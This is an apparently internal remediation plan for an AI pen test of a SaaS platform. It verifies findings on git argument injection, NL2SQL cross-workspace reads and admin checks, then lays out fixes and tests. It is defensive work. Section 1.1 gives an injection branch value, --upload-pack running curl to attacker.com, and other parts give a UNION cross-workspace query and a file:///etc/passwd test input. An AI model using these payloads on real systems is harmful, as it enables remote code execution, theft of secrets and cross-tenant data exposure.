PRD-70: Security Hardening — Pen Test Remediation

Version: 1.0 Status: Draft — CRITICAL PRIORITY Priority: P0 Author: Gar Kavanagh + Auto CTO Created: 2026-03-03 Updated: 2026-03-03 Dependencies: PRD-44 (Security Hardening Architecture — 12 of 45 stories complete), PRD-18 (Credential Management — COMPLETE), PRD-61 (NL2SQL V2 — COMPLETE) Source: Shannon AI Penetration Test Report (2026-03-03), 4.4 hours, $90.83, 12 phases completed Branch: fix/pentest-remediation-70


Executive Summary

On 2026-03-03, the Shannon AI penetration testing framework completed a full-scope assessment of https://ui.automatos.app covering authentication, authorization, XSS, SQL/command injection, and SSRF. Shannon was unable to breach the external perimeter — zero vulnerabilities were exploited from an unauthenticated position. Clerk auth, the waitlist system, and Next.js framework protections held.

However, Shannon identified 8 injection vulnerabilities and 21 authorization concerns through code analysis that become exploitable once an attacker has a valid account. Since Automatos is a SaaS platform where every paid user gets an authenticated session, "requires authentication" is not a mitigating factor — it's the baseline.

Independent Verification Results

I independently verified every Shannon finding against the actual codebase. Shannon's analysis was partially based on PRD documentation rather than live code (they acknowledged this limitation). Here's what changed after verification:

Shannon Finding
Shannon Severity
Verified Severity
Notes

7 command injection (git clone)

CRITICAL

CRITICAL — Confirmed

3 distinct code paths, all missing -- separator, branch params unvalidated

1 SQL injection (NL2SQL)

CRITICAL

MEDIUM — Downgraded

PRD-61 fix catches mutations in subqueries. Real risk is UNION cross-workspace reads

Auto-admin @automatos.app

CRITICAL

LOW — Downgraded

Backend removed this (clerk.py:196). Frontend-only — doesn't grant backend access

Frontend-only admin auth

CRITICAL

FALSE POSITIVE

Backend has _assert_admin() on every admin endpoint

21 IDOR / authz issues

HIGH (21 items)

LOW — Downgraded

Backend consistently filters by workspace_id on all CRUD operations

4 SSRF via git clone

HIGH

CRITICAL — Same as cmd injection

Same root cause as command injection findings

JWT audience validation

MEDIUM

MEDIUM — Confirmed

Configuration check needed

Generated images proxy SSRF

MEDIUM

FALSE POSITIVE — Confirmed

Next.js framework protection blocks exploitation

Bottom line: Shannon overcounted by basing findings on PRD docs instead of actual code. The real attack surface is smaller but the git clone vulnerabilities are genuinely critical. This PRD fixes everything that actually matters.

What's Actually Critical

  1. Git argument injection — 3 live code paths allow RCE via --upload-pack flag injection. Authenticated users can execute arbitrary commands on the backend server.

  2. Missing -- separator — No git subprocess call uses -- to delimit options from positional arguments. URLs starting with -- are interpreted as flags.

  3. NL2SQL cross-workspace reads — The validator prevents mutations but doesn't enforce workspace isolation in SELECT queries. UNION-based cross-workspace data exfiltration is possible.

  4. Database SSL not enforced — Connection strings lack sslmode=require.

  5. Frontend auto-admin remnantrole-context.tsx:44-48 still grants admin UI to @automatos.app emails even though the backend ignores it.


1. Findings Detail

1.1 CRITICAL: Git Argument Injection (3 Code Paths + 1 Script)

All paths share the same root cause: user-controlled branch parameters are passed to git subprocess calls without validation, and no -- separator is used.

Path A: Skills Import (skill_loader.py) — HIGHEST RISK

Critical discovery: The skills import endpoint at api/skills.py:183 has NO admin check. ANY authenticated user can import git repos. Skills auto-activate immediately with no approval workflow (unlike plugins which require admin approval + security scan).

What's validated: validate_git_url() at line 96 checks the URL hostname against an allowlist (github.com, gitlab.com, bitbucket.org). This blocks arbitrary URLs but does NOT prevent branch parameter injection.

What's NOT validated:

  • branch parameter — no validation at all. --upload-pack='bash -c "curl attacker.com"' as branch value gives RCE.

  • No -- separator before positional git_url argument

Contrast with Plugins: The plugin import path (POST /api/admin/plugins/import-github) correctly requires _assert_admin() at line 507 of admin_plugins.py, runs a full security scan (static + LLM), and requires admin approval. Skills bypass all of this.

Decision: Lock skills import to admin-only for now. Future: build a safe user-facing import flow with full security scan + marketplace approval, matching the plugin pipeline.

Path B: CodeGraph Indexing (codegraph_service.py) — KEEP BUT SECURE

What's validated: Nothing. The IndexGitHubRequest Pydantic model accepts any string as github_url — no URL parsing, no domain check, no protocol check.

What works well:

  • Workspace scoping is enforced at DB level — all codegraph tables filter by workspace_id

  • Clones into tempfile.mkdtemp() — cleaned up on success and failure

  • Duplicate prevention — won't re-index if status is already "indexing"

What needs fixing:

  • Add URL validation (HTTPS only, github.com/gitlab.com/bitbucket.org only — this IS a code indexing tool)

  • Add branch validation (no leading -)

  • GitPython's Repo.clone_from() passes branch to git CLI — same injection risk

  • Auth token injected into URL at line 452 — if exception leaks the URL, token is exposed

Path C: Workspace GitHub Clone (workspace_github.py) — BEST ISOLATED

Already well-secured:

  • CloneRequest Pydantic model has @field_validator("repo_url") — validates HTTPS only, allowed hosts (github.com, gitlab.com, bitbucket.org), strips embedded credentials

  • Runs in separate workspace-worker container (not the backend server)

  • Per-workspace filesystem isolation (/workspaces/{workspace_id}/)

  • Backend has read-only mount; worker has read-write

  • Command whitelist blocks sudo, su, mount, etc.

  • Path traversal prevention via resolve_safe_path()

  • 5GB quota per workspace

  • Workspace access verified at line 180

What still needs fixing:

  • branch parameter has no validation — same leading - injection risk

  • Worker's git clone command doesn't use -- separator

  • These are lower severity because the worker container has limited blast radius vs. the backend server

Path D: Plugin Harvest Script (harvest_plugins.py)

Lower risk: Standalone script, not an API endpoint. URLs come from hardcoded CURATED_REPOS list. Plugins go through PluginUploadService with full security scan. Fix for completeness.

1.2 MEDIUM: NL2SQL Validator Gaps

Shannon's claim: "Regex validator fails to detect nested subqueries with mutations."

Actual state: The validator at modules/nl2sql/query/validator.py:203-210 was fixed in PRD-61 (US-009). It strips string literals, then checks DENY_KEYWORDS (\bINSERT\b, \bUPDATE\b, \bDELETE\b, etc.) across the ENTIRE SQL including subqueries. Nested INSERT INTO ... RETURNING * WOULD be caught because \bINSERT\b matches the keyword even inside a subquery.

What IS still vulnerable:

  1. UNION cross-workspace readsSELECT * FROM users WHERE workspace_id = 'mine' UNION SELECT * FROM users WHERE workspace_id = 'theirs'. No mutations, passes all keyword checks. The table allowlist helps (line 214-223 validates tables against schema metadata), but if the NL2SQL data source includes shared tables like users or workspace_members, cross-workspace reads are possible.

  2. RETURNING not in deny list — While INSERT is denied, if an LLM generates SQL using only RETURNING in a creative way, there's no catch.

  3. Regex fundamentally can't parse SQL — Edge cases will always exist. AST-based parsing is the correct approach.

Real severity: MEDIUM (not CRITICAL). The mutation protection works. The residual risk is cross-workspace SELECTs.

1.3 LOW: Frontend Auto-Admin Remnant

Backend status: Removed. orchestrator/core/auth/clerk.py:196 has the comment: "Domain-based auto-admin was removed for security (see PRD-43 US-025)."

Impact: Frontend shows admin UI to @automatos.app users, but all admin API calls go through _assert_admin() which checks system_role from the Clerk JWT, not email domain. An attacker registering with @automatos.app email gets admin UI but every admin API call returns 403.

Still should be fixed: The frontend check should be removed to prevent confusion and to align with the principle that security decisions should never happen in the frontend.

1.4 FALSE POSITIVES (Shannon Overcounts)

21 IDOR / authorization issues: Backend verification confirms comprehensive workspace filtering:

  • agents.py:611Agent.workspace_id == ctx.workspace_id

  • documents.py:501Document.workspace_id == ctx.workspace_id

  • workflows.py:387Workflow.workspace_id == ctx.workspace_id

  • channels.py — parameterized workspace_id in raw SQL

  • Admin endpoints — _assert_admin() on every handler

  • Chat endpoints — user_id ownership checks

Shannon could not test these from an unauthenticated position and classified them based on PRD documentation rather than actual code review. The backend implementation is sound.

Frontend-only admin auth: Backend admin_plugins.py and admin_prompts.py both implement _assert_admin() — a function that checks ctx.user.system_role in ("admin", "super_admin") on every request. This is not frontend-only.

1.5 MEDIUM: Infrastructure Gaps (From Data Security Audit)

Gap
Current State
Risk

Database SSL

No sslmode in DATABASE_URL

Data in transit unencrypted between backend and Postgres

Redis TLS

No TLS configured

Cached data (sessions, rate limits) unencrypted

Redis dangerous commands

FLUSHDB, FLUSHALL, CONFIG available

If Redis exposed, full data wipe possible

Audit service

Stub file (199 bytes, no implementation)

No audit trail for security-sensitive operations

JWT audience validation

Optional — may not be configured

Cross-Clerk-app JWT reuse if CLERK_AUDIENCE unset


2. Remediation Plan

Phase 1: Critical Fixes (Week 1) — Stop the Bleeding

These fixes prevent RCE on the backend server. Ship immediately.

FIX-01: Secure Git Operations (ALL code paths)

Create: orchestrator/core/security/git_sanitizer.py

Modify files:

File
Change
Priority

api/skills.py

Add _assert_admin(ctx) check to import_git_repository() at line 183. Skills import is admin-only until a safe user-facing flow is built.

P0

modules/agents/services/skill_loader.py

Replace inline validate_git_url with import from git_sanitizer. Add validate_branch() call before _git_clone(). Use build_git_clone_cmd() in _git_clone().

P0

modules/codegraph/codegraph_service.py

Add validate_git_url() + validate_branch() before Repo.clone_from(). Validate URL is HTTPS + allowed domain (this is a code indexing tool — only git hosts make sense).

P0

api/workspace_github.py

Add validate_branch() before building task step. URL already validated by Pydantic model.

P1

services/workspace-worker/executor.py

Add -- separator to git clone command in _git_clone() handler (line ~380). Add validate_branch().

P1

scripts/harvest_plugins.py

Add validate_git_url() before clone_repo(). Use build_git_clone_cmd().

P2

Key principles:

  • Every git URL is validated: HTTPS only, domain allowlist, no leading -

  • Every branch name is validated: alphanumeric + ./_-, no leading -

  • Every subprocess.run git call uses -- separator before positional args

  • One module, one import — no per-file reimplementation

  • Skills import locked to admin-only (matches plugin import pattern)

FIX-02: Remove Frontend Auto-Admin

Modify: frontend/contexts/role-context.tsx

Delete lines 44-49 (the @automatos.app domain check). Admin role should come exclusively from Clerk publicMetadata.role.

FIX-03: Enforce JWT Audience Validation

Modify: orchestrator/core/auth/clerk.py

Ensure CLERK_AUDIENCE is set and validated. Add a startup check:

Add to deployment checklist: CLERK_AUDIENCE must be set in all environments.

Phase 2: Defense in Depth (Week 2) — Harden the Perimeter

FIX-04: NL2SQL Query Hardening

Modify: orchestrator/modules/nl2sql/query/validator.py

  1. Add RETURNING to deny list:

  2. Enforce workspace isolation at SQL level:

  3. Add CTE detection:

  4. Future: Replace regex with AST parsing (Phase 3). Use sqlglot or pglast to parse SQL into an AST and validate the tree structure rather than string patterns.

FIX-05: Database Connection Security

Modify: orchestrator/config.py and docker-compose.yml

  1. Add sslmode=require to DATABASE_URL:

  2. Disable Redis dangerous commands in docker-compose.yml:

    Note: CONFIG rename breaks Redis introspection tools. Only apply in production. Use an environment-conditional redis.conf if needed.

FIX-06: Audit Service Implementation

Modify: orchestrator/core/services/audit_service.py

The audit service is currently a 199-byte stub. Implement actual audit logging for security-sensitive operations:

Write to the audit_logs table (already defined in schema). Include: timestamp, user_id, workspace_id, event_type, resource_id, ip_address, user_agent, result (success/failure), and metadata JSON.

Phase 3: Proactive Security (Weeks 3-4)

FIX-07: Rate Limiting per Workspace

Modify: Rate limiting configuration

Current: 60 req/min per IP (global). Add per-workspace rate limiting for sensitive operations:

Operation
Rate Limit

Git clone (any path)

5/hour per workspace

NL2SQL query

30/min per workspace

Admin operations

20/min per user

Plugin/skill import

3/hour per workspace

FIX-08: CSP and Security Headers

Modify: frontend/middleware.ts or Next.js config

Verify and enforce:

  • Content-Security-Policy — restrict script sources, prevent inline scripts

  • X-Content-Type-Options: nosniff

  • X-Frame-Options: DENY

  • Referrer-Policy: strict-origin-when-cross-origin

  • Permissions-Policy — disable unused browser features

FIX-09: Dependency Audit

Run pip audit and npm audit / yarn audit to identify known CVEs in dependencies. Fix or pin affected packages.

FIX-10: Scheduled Shannon Re-Test

After all fixes are deployed, re-run Shannon with authenticated test credentials to:

  1. Verify all injection paths are blocked

  2. Test IDOR/authz with actual authenticated sessions

  3. Validate workspace isolation under adversarial conditions


3. File Impact Table

New Files

File
Fix
Description

orchestrator/core/security/__init__.py

FIX-01

Security utilities package

orchestrator/core/security/git_sanitizer.py

FIX-01

Centralized git URL/branch validation

orchestrator/tests/security/test_git_sanitizer.py

FIX-01

Unit tests for git sanitizer

orchestrator/tests/security/test_nl2sql_validator.py

FIX-04

Adversarial SQL injection test cases

Modified Files

File
Fix
Change

orchestrator/api/skills.py

FIX-01

Add _assert_admin() to skills git import endpoint — admin-only until safe user flow exists

orchestrator/modules/agents/services/skill_loader.py

FIX-01

Replace inline validation with git_sanitizer imports; add -- separator; add branch validation

orchestrator/modules/codegraph/codegraph_service.py

FIX-01

Add URL/branch validation before Repo.clone_from(); HTTPS + domain allowlist

orchestrator/api/workspace_github.py

FIX-01

Add branch validation before task submission (URL already validated by Pydantic)

services/workspace-worker/executor.py

FIX-01

Add -- separator + branch validation in _git_clone() handler

orchestrator/scripts/harvest_plugins.py

FIX-01

Add URL validation; use build_git_clone_cmd()

frontend/contexts/role-context.tsx

FIX-02

Remove @automatos.app auto-admin logic

orchestrator/core/auth/clerk.py

FIX-03

Enforce CLERK_AUDIENCE validation

orchestrator/config.py

FIX-03, FIX-05

Add CLERK_AUDIENCE config; add sslmode to DATABASE_URL

orchestrator/modules/nl2sql/query/validator.py

FIX-04

Add RETURNING/COPY/EXECUTE to deny list; add CTE detection; add workspace filter injection

docker-compose.yml

FIX-05

Disable Redis dangerous commands

orchestrator/core/services/audit_service.py

FIX-06

Implement actual audit logging (replace stub)


4. Test Plan

Unit Tests (FIX-01: Git Sanitizer)

Unit Tests (FIX-04: NL2SQL Hardening)

Integration Tests

Test
Validates

Submit skills import with --upload-pack as branch

Returns 400, not 500 or RCE

Submit codegraph index with file:///etc/passwd as URL

Returns 400

Submit workspace clone with internal IP as URL

Returns 400

Admin endpoint without admin role

Returns 403 (backend enforced)

NL2SQL with UNION cross-workspace query

Returns validation error

Regression Test (Post-Deploy)

Re-run Shannon with authenticated test credentials. Provide:

  • 2 test accounts in different workspaces (for IDOR testing)

  • 1 admin account (for vertical escalation testing)

  • 1 regular user account (for privilege escalation testing)


5. Deployment Checklist

Pre-Deploy (Environment Config)

Deploy Order

  1. FIX-01 (git sanitizer) — Ship first, blocks RCE

  2. FIX-02 (frontend auto-admin removal) — Quick frontend deploy

  3. FIX-03 (JWT audience) — Config change + code

  4. FIX-04 (NL2SQL hardening) — Backend deploy

  5. FIX-05 (DB/Redis security) — Infrastructure change, schedule maintenance window

  6. FIX-06 (audit service) — Backend deploy

  7. FIX-07 through FIX-09 — Iterative hardening

Post-Deploy Verification


6. Architecture Context: Why Each Path Has Different Risk

Understanding the isolation model changes the severity assessment:

Path C (workspace clone) is the only one with meaningful isolation. Paths A and B execute git on the backend server where environment variables contain database credentials, API keys, and secrets. An --upload-pack injection on Path A or B gives RCE with full access to POSTGRES_PASSWORD, OPENROUTER_API_KEY, CLERK_SECRET_KEY, etc.

Skills vs. Plugins: The Access Control Gap

Aspect
Skills (PRD-22)
Plugins (PRD-42)

Import endpoint

POST /api/v1/skills/sources/git

POST /api/admin/plugins/import-github

Auth requirement

Any authenticated user

Admin only (_assert_admin())

Security scan

Basic pattern matching (8 patterns)

Full static + LLM-based scan

Approval workflow

None — auto-activated

Admin approval required

Activation scope

Global (all workspaces)

Per-workspace enablement

Assignment

Direct to any agent

Via AgentAssignedPlugin

The fix: Lock POST /api/v1/skills/sources/git to admin-only immediately. This matches the plugin import pattern and removes the unauthenticated-user-to-RCE chain. Future: build a safe user-facing skill import with the same security scan + approval workflow that plugins use.


7. Shannon Assessment Quality Notes

Shannon ran a thorough 4.4-hour assessment across 12 phases. Key observations:

Strengths:

  • Excellent external perimeter testing — confirmed Clerk auth is robust (rate limiting at 5 attempts, Cloudflare Turnstile CAPTCHA active, bot detection working)

  • Thorough injection analysis — identified every git clone code path

  • Good methodology — proof-by-exploitation focus, no assumptions

  • Honest about limitations (documented that backend code analysis was based on PRDs, not actual code)

Limitations:

  • Based several backend findings on PRD documentation, not actual Python source (acknowledged in report)

  • Overcounted authorization issues (21) that were actually properly implemented in the backend

  • Classified NL2SQL validator as fully bypassable — missed the PRD-61 fix that catches mutations in subqueries

  • Auto-admin finding was based on frontend code only — didn't verify backend enforcement

Recommendation: Next Shannon run should:

  1. Be given read access to the actual orchestrator/ Python source

  2. Be provided authenticated test credentials (bypass waitlist)

  3. Run an internal-scope test focused on the 21 authz items that couldn't be tested externally

Last updated